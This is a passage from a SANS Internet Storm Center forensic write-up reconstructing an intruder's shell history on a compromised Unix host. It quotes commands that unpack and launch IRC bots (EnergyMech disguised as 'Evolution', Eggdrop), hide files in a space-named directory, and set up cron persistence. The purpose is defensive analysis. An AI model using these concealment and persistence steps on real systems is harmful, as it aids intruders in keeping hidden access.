We are not quite sure whether any of the above exploits was successful. The id command, or the exploit itself, would have told the attacker whether he got lucky, but there aren't any traces in the shell history file that would tell us either way.
In any case .. follows Phase #3a: The attacker installs some goodies. virus.tar isn't really a virus, it is a copy of EnergyMech, an IRC bot. Note how the bad guy uses Nano to edit the config file, which tells us that he isn't all that experienced on Unix. A real Unix hacker would most likely use vi, because vi is present on all Unix flavors and versions. Note also how he calls the IRC bot Evolution when he starts it, likely hoping that an admin would overlook it in a casual investigation.
/sbin/ifconfig -a | grep inet
tar xvf virus.tar
rm -rf virus.tar
chmod +x *
Phase#3b: Install some more goodies. egg.tgz is a copy of Eggdrop, another IRC bot. Note how the bad guy puts the files into a directory called (single space). If you want to search for such directories on your system, try this
#find / -name
tar zxvf egg.tgz
rm -rf egg.tgz
chmod +x *
./eggdrop -m bot1.conf
Phase #4: The attacker wants to make sure that access can be re-gained, and configures the cron tab to re-start some of his processes automatically on a schedule.
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.